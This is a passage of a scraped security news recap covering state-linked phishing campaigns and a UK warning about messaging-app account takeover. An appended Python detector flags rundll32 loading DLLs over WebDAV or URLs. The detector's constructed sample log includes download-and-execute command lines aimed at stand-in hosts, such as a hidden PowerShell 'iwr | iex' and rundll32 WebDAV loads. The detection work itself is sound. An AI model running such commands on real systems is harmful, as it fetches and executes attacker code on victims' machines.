Proofpoint <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targets\">said<\/a> it has recorded an increase in campaigns from state-sponsored threat actors likely affiliated with China (UNK_InnerAmbush, which uses phishing emails to deliver <a href=\"https:\/\/www.pointwild.com\/threat-intelligence\/cobalt-strike-overview\">Cobalt Strike<\/a> payloads), Belarus (<a 
href=\"https:\/\/thehackernews.com\/2023\/03\/winter-vivern-apt-targets-european.html\">TA473<\/a>, which has used HTML attachments in emails for reconnaissance), Pakistan (UNK_RobotDreams, which has sent spear-phishing emails to India-based offices of Middle East government entities to deliver a <a href=\"https:\/\/thehackernews.com\/2026\/03\/transparent-tribe-uses-ai-to-mass.html\">Rust backdoor<\/a>), and Hamas (<a href=\"https:\/\/thehackernews.com\/2023\/11\/new-campaign-targets-middle-east.html\">TA402<\/a>, which has used compromised Iraq government email addresses to conduct Microsoft account credential harvesting) targeting Middle East government organizations. The&nbsp;enterprise security company said it also identified the Charming Kitten actor targeting a think tank in the U.S. to&nbsp;trick recipients into entering their Microsoft account credentials. One&nbsp;activity cluster that remains unattributed is UNK_NightOwl. The&nbsp;email messages include a domain that spoofed Microsoft OneDrive, leading the victim to a credential harvesting page. If&nbsp;the user enters credentials and clicks the sign-in button, the target is redirected to &#8220;hxxps:\/\/iran.liveuamap[.]com\/,&#8221; a legitimate open-source platform called Liveuamap with news updates on the Middle East conflict.<\/li>\n<li><strong>U.K. Warns&nbsp;of Messaging App Targeting <\/strong>&#8212;The U.K. 
National Cyber Security Centre (NCSC) became the latest cybersecurity agency to warn of <a href=\"https:\/\/www.ncsc.gov.uk\/news\/ncsc-warns-of-messaging-app-targeting\">malicious activity<\/a> targeting users of messaging apps like WhatsApp, Messenger, and Signal, where threat actors could trick high-risk individuals into <a href=\"https:\/\/thehackernews.com\/2026\/03\/fbi-warns-russian-hackers-target-signal.html\">sharing their login or account recovery codes<\/a>, or into linking an attacker-controlled device to their accounts.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd27 Cybersecurity&nbsp;Tools<\/strong><\/h2>\n<ul>\n<li><a href=\"https:\/\/github.com\/step-security\/dev-machine-guard\">Dev Machine Guard<\/a> &#8594; It is an open-source script that scans a developer machine to list installed tools and detect security risks across IDEs, AI agents, extensions, and configurations, without accessing source code or secrets, helping expose gaps traditional tools miss in developer environments.<\/li>\n<li><a href=\"https:\/\/github.com\/praetorian-inc\/pius\">Pius<\/a> &#8594; It is an open-source tool that maps a company&#8217;s external attack surface by discovering and cataloging internet-facing assets, helping security teams identify exposure and reconnaissance risks that could be targeted by attackers.<\/li>\n<\/ul>\n<p><em>Disclaimer: For research and educational use only. Not&nbsp;security-audited. Review&nbsp;all code before use, test in isolated environments, and ensure compliance with applicable&nbsp;laws.<\/em><\/p>\n<h2 style=\"text-align: left;\"><strong>Conclusion<\/strong><\/h2>\n<p>The lesson is simple. Small&nbsp;things matter. Most&nbsp;issues now start from normal parts of the system, not big, obvious&nbsp;gaps.<\/p>\n<p>Don&#8217;t trust anything just because it looks routine. Updates, tools, and background systems can all&nbsp;be used in the wrong&nbsp;way. If&nbsp;it seems low risk, check it again. 
That&#8217;s where the problems are starting&nbsp;now.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This&nbsp;week had real hits. The&nbsp;key software got tampered with. Active&nbsp;bugs showed up in the tools people use every day. Some&nbsp;attacks didn&#8217;t even need much effort because the path was already&nbsp;there.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-45160","post","type-post","status-publish","format-standard","hentry","category-thehackernews"],"_links":{"self":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts\/45160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/comments?post=45160"}],"version-history":[{"count":0,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts\/45160\/revisions"}],"wp:attachment":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/media?parent=45160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.t
op\/index.php\/wp-json\/wp\/v2\/categories?post=45160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/tags?post=45160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
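The ClickFix variant in the recap above swaps the usual PowerShell one-liner for a rundll32.exe command that pulls a DLL from an attacker-controlled WebDAV share. The following is an added detection example written for this recap, not code from CyberProof, The Hacker News, or any of the vendors cited: it runs over process-creation command lines and flags rundll32 being handed a WebDAV path (the Windows redirector syntax `\\host@SSL\DavWWWRoot\...` or `\\host@port\...`), an http(s) URL, or any other remote UNC path, while leaving ordinary local DLL invocations alone. The sample command lines are constructed, the hostnames and IP addresses in them are assumptions, and pulling the CommandLine field out of Sysmon or EDR events is left to the reader's pipeline.

```python
"""Flag rundll32.exe invocations that load a DLL from WebDAV, a URL, or a remote UNC share.

Added example for the ClickFix rundll32/WebDAV variant; not code from the page or the
vendors it cites. Input is plain command-line strings; the sample log is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# rundll32 invoked by bare name, with .exe, or by full path (C:\Windows\System32\rundll32.exe).
RUNDLL32 = re.compile(r'(?:^|[\\\s"])rundll32(?:\.exe)?\b', re.I)

# Windows WebDAV redirector syntax: \\host[@SSL][@port]\[DavWWWRoot\]path
# The @SSL / @port / DavWWWRoot markers are WebDAV-only; SMB shares never carry them.
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[\w.-]+)(?P<dav>(?:@ssl)?(?:@\d{1,5})?)\\(?P<root>davwwwroot\\)?(?P<path>\S+)",
    re.I,
)
# Any other remote share: \\host\share\file.dll (lower fidelity; baseline before alerting).
ANY_UNC = re.compile(r"\\\\[\w.-]+\\\S+")
HTTP_URL = re.compile(r"\bhttps?://\S+", re.I)


@dataclass
class Finding:
    line_no: int
    reason: str
    command: str


def rundll32_args(cmd: str) -> Optional[str]:
    """Return the argument text following the rundll32 token, or None if rundll32 is absent."""
    m = RUNDLL32.search(cmd)
    if not m:
        return None
    # Drop the closing quote of a quoted image path and the separating whitespace.
    return cmd[m.end():].lstrip('" ')


def classify(cmd: str) -> Optional[str]:
    """Return a reason string when the rundll32 DLL argument is remote, else None."""
    args = rundll32_args(cmd)
    if not args:
        return None
    m = WEBDAV_UNC.search(args)
    if m and (m.group("dav") or m.group("root")):
        return "rundll32 loading DLL over WebDAV from %s" % m.group("host")
    if HTTP_URL.search(args):
        return "rundll32 given an http(s) URL instead of a local DLL path"
    if ANY_UNC.search(args):
        return "rundll32 loading DLL from a remote UNC share"
    return None  # local path such as C:\Windows\System32\shell32.dll


def scan(lines: Iterable[str]) -> list:
    """Run classify() over command lines and collect findings (1-based line numbers)."""
    findings = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            findings.append(Finding(n, reason, line))
    return findings


# Constructed process-creation command lines, not real telemetry. Hosts/IPs are assumptions.
SAMPLE_LOG = [
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",  # benign
    r"rundll32.exe \\203.0.113.7@80\DavWWWRoot\update.dll,Start",                         # WebDAV
    r"rundll32 \\cdn-update.example@SSL\share\helper.dll,DllRegisterServer",             # WebDAV over TLS
    r'"C:\Windows\System32\rundll32.exe" https://203.0.113.7/x.dll,Run',                # URL argument
    r'powershell.exe -w hidden -c "iwr https://203.0.113.7/a.ps1 | iex"',                # classic ClickFix, not rundll32
    r"rundll32.exe \\fileserver\tools\legacy.dll,Init",                                   # plain UNC share
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}\n    {f.command}")
```

The `@SSL`, `@port` and `DavWWWRoot` markers are the high-fidelity part of this rule: they only appear when Windows routes the path through the WebDAV redirector, which is exactly what this variant relies on. The URL and plain-UNC branches are noisier (software deployed from file servers, and `url.dll,FileProtocolHandler` launches, will hit them) and should be baselined before they page anyone. A complementary hardening check is whether the WebClient service is running on endpoints that have no business reason to speak WebDAV; without it the `\\host@SSL\...` path cannot resolve at all.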